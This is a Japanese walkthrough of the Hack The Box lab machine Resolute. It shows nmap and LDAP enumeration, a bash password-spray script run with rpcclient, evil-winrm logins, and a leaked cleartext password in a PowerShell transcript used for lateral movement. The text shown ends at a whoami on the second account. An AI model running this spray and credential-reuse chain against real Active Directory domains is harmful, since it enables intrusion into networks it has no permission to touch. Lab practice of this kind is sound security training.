🌟
Resolute_HTB
概要
- Resolute は、Active Directory を備えた簡単な難易度の Windows マシンです。
- Active Directory の匿名バインドは、システム管理者が新しいユーザー アカウントに設定したパスワードを取得するために使用される。
- そのアカウントのパスワードはその後変更されているようです。
- パスワード スプレーにより、このパスワードが別のドメイン ユーザー アカウントでまだ使用されていることがわかり、WinRM 経由でシステムにアクセスできるようになります。
- コマンドラインで渡された資格情報をキャプチャした PowerShell トランスクリプト ログが検出されます。
- これは、DnsAdmins グループのメンバーであるユーザーに横方向に移動するために使用されます。
- このグループには、DNS サーバー サービスがプラグイン DLL をロードするように指定する機能があります。
- DNS サービスを再起動した後、
NT_AUTHORITY\SYSTEMのコンテキストでドメイン コントローラー上でコマンドを実行します。
SCAN
nmap
┌──(kali㉿kali)-[~]
└─$ nmap -sV -Pn -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 20:40 EST
Nmap scan report for 10.10.10.169
Host is up (0.33s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 01:49:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
- 評価
- Domain: megabank.local
- Domain名が判明したのでldapに対する攻撃ができそう
- Microsoft Windows Server 2008
- 古いからnopacも行けそう
- Domain: megabank.local
winldap
- insatll
┌──(kali㉿kali)-[~/Resolute]
└─$ git clone https://github.com/ropnop/windapsearch.git
Cloning into 'windapsearch'...
remote: Enumerating objects: 83, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 69
Receiving objects: 100% (83/83), 44.61 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (48/48), done.
- そのままでは動かないためREADMEに書いてある通り行うが動かず
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ pip install python-ldap
Defaulting to user installation because normal site-packages is not writeable
Collecting python-ldap
Downloading python-ldap-3.4.4.tar.gz (377 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 1.0 MB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
Building wheel for python-ldap (pyproject.toml) ... error
error: subprocess-exited-with-error
× Building wheel for python-ldap (pyproject.toml) did not run successfully.
│ exit code: 1
╰─> [83 lines of output]
running bdist_wheel
running build
running build_py
creating build
creating build/lib.linux-x86_64-cpython-311
copying Lib/ldapurl.py -> build/lib.linux-x86_64-cpython-311
copying Lib/ldif.py -> build/lib.linux-x86_64-cpython-311
creating build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/compat.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/constants.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/functions.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/logger.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/sasl.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/cidict.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/pkginfo.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/dn.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/filter.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/async.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/modlist.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/resiter.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/syncrepl.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/asyncsearch.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/ldapobject.py -> build/lib.linux-x86_64-cpython-311/ldap
creating build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/deref.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/ppolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/psearch.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/sss.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/pagedresults.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/sessiontrack.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/libldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/readentry.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/pwdpolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/vlv.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/simple.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/openldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
creating build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/dds.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/passwd.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
creating build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/models.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/tokenizer.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/subentry.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
creating build/lib.linux-x86_64-cpython-311/slapdtest
copying Lib/slapdtest/_slapdtest.py -> build/lib.linux-x86_64-cpython-311/slapdtest
copying Lib/slapdtest/__init__.py -> build/lib.linux-x86_64-cpython-311/slapdtest
running egg_info
writing Lib/python_ldap.egg-info/PKG-INFO
writing dependency_links to Lib/python_ldap.egg-info/dependency_links.txt
writing requirements to Lib/python_ldap.egg-info/requires.txt
writing top-level names to Lib/python_ldap.egg-info/top_level.txt
reading manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
no previously-included directories found matching 'Doc/.build'
adding license file 'LICENCE'
writing manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
creating build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/README -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/ca.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/ca.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/gencerts.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/gennssdb.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
running build_ext
building '_ldap' extension
creating build/temp.linux-x86_64-cpython-311
creating build/temp.linux-x86_64-cpython-311/Modules
x86_64-linux-gnu-gcc -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -fPIC -DHAVE_SASL -DHAVE_TLS -DLDAPMODULE_VERSION=3.4.4 "-DLDAPMODULE_AUTHOR=python-ldap project" "-DLDAPMODULE_LICENSE=Python style" -IModules -I/usr/include/python3.11 -c Modules/LDAPObject.c -o build/temp.linux-x86_64-cpython-311/Modules/LDAPObject.o
In file included from Modules/LDAPObject.c:3:
Modules/common.h:15:10: fatal error: lber.h: No such file or directory
15 | #include <lber.h>
| ^~~~~~~~
compilation terminated.
error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
ERROR: Failed building wheel for python-ldap
Failed to build python-ldap
ERROR: Could not build wheels for python-ldap, which is required to install pyproject.toml-based projects
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip install python-ldap
Collecting python-ldap
Downloading python-ldap-3.4.4.tar.gz (377 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 3.1 MB/s eta 0:00:00
Installing build dependencies ... done
^C Getting requirements to build wheel ... canceled
ERROR: Operation cancelled by user
- libsasl2-devをapt-getすることでうまくいく
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo apt-get install libsasl2-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
libaio1
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
libsasl2-2 libsasl2-modules libsasl2-modules-db libssl-dev
libssl3 openssl
Suggested packages:
libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal
libsasl2-modules-ldap libsasl2-modules-otp
libsasl2-modules-sql libssl-doc
The following NEW packages will be installed:
libsasl2-dev libssl-dev
The following packages will be upgraded:
libsasl2-2 libsasl2-modules libsasl2-modules-db libssl3
openssl
5 upgraded, 2 newly installed, 0 to remove and 1550 not upgraded.
Need to get 6,235 kB of archives.
After this operation, 13.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-db amd64 2.1.28+dfsg1-4 [19.4 kB]
Get:2 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling/main amd64 libssl3 amd64 3.0.11-1 [2,016 kB]
Get:3 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-2 amd64 2.1.28+dfsg1-4 [56.7 kB]
Get:4 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 libssl-dev amd64 3.0.11-1 [2,431 kB]
Get:6 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules amd64 2.1.28+dfsg1-4 [65.8 kB]
Get:7 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 openssl amd64 3.0.11-1 [1,416 kB]
Get:5 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-dev amd64 2.1.28+dfsg1-4 [230 kB]
Fetched 6,235 kB in 4s (1,732 kB/s)
(Reading database ... 420821 files and directories currently installed.)
Preparing to unpack .../0-libsasl2-modules-db_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../1-libssl3_3.0.11-1_amd64.deb ...
Unpacking libssl3:amd64 (3.0.11-1) over (3.0.8-1) ...
Preparing to unpack .../2-libsasl2-2_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-2:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Selecting previously unselected package libssl-dev:amd64.
Preparing to unpack .../3-libssl-dev_3.0.11-1_amd64.deb ...
Unpacking libssl-dev:amd64 (3.0.11-1) ...
Selecting previously unselected package libsasl2-dev.
Preparing to unpack .../4-libsasl2-dev_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-dev (2.1.28+dfsg1-4) ...
Preparing to unpack .../5-libsasl2-modules_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../6-openssl_3.0.11-1_amd64.deb ...
Unpacking openssl (3.0.11-1) over (3.0.8-1) ...
Setting up libssl3:amd64 (3.0.11-1) ...
Setting up libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) ...
Setting up libssl-dev:amd64 (3.0.11-1) ...
Setting up libsasl2-2:amd64 (2.1.28+dfsg1-4) ...
Setting up openssl (3.0.11-1) ...
Installing new version of config file /etc/ssl/openssl.cnf.original ...
Setting up libsasl2-modules:amd64 (2.1.28+dfsg1-4) ...
Setting up libsasl2-dev (2.1.28+dfsg1-4) ...
Processing triggers for libc-bin (2.36-9) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.2.3) ...
Scanning processes...
Scanning candidates...
Scanning linux images...
Running kernel seems to be up-to-date.
Restarting services...
/etc/needrestart/restart.d/systemd-manager
systemctl restart open-vm-tools.service systemd-journald.service systemd-udevd.service udisks2.service
Service restarts being deferred:
systemctl restart NetworkManager.service
/etc/needrestart/restart.d/dbus.service
systemctl restart docker.service
systemctl restart lightdm.service
systemctl restart systemd-logind.service
No containers need to be restarted.
User sessions running outdated binaries:
kali @ session #2: firefox-esr[35968], lightdm[1251],
qterminal[1986], vmtoolsd[1601], xfce4-panel[1444],
xfce4-session[1287]
kali @ user manager service: at-spi-bus-laun[1368],
systemd[1257]
No VM guests are running outdated hypervisor (qemu) binaries on
this host.
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip3 install python-ldap
Collecting python-ldap
Using cached python-ldap-3.4.4.tar.gz (377 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
Building wheel for python-ldap (pyproject.toml) ... done
Created wheel for python-ldap: filename=python_ldap-3.4.4-cp311-cp311-linux_x86_64.whl size=369623 sha256=bb454d67a738df7c7910dc2d21a0eadf1a0e14ba58094ae4152d8d0a57a3bff1
Stored in directory: /root/.cache/pip/wheels/72/59/42/74cab8c1fe6e14c49959206b24b0f87697351eea2ac9787401
Successfully built python-ldap
Installing collected packages: python-ldap
Successfully installed python-ldap-3.4.4
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
- winldapsearchを使用した情報収集
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U > Users
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
- test.sh作成
┌──(kali㉿kali)-[~/Resolute]
└─$ cat test.sh
# /bin/bash
for u in $(cat ./users | awk -F@ '{print $1}' | awk -F: '{print $2}');
do
rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority;
done
- 実行
┌──(kali㉿kali)-[~/Resolute]
└─$ ./test.sh
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Initial Access
┌──(kali㉿kali)-[~/Resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
横展開先の情報収集
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/2/2024 5:47 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> gc c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\Users\melanie\Desktop>
- 評価
- PowerShellの履歴からnet useコマンドの形跡を確認
- これをつかって横展開できそう
- PowerShellの履歴からnet useコマンドの形跡を確認
横展開
──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
横展開先で情報収集
whoami
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
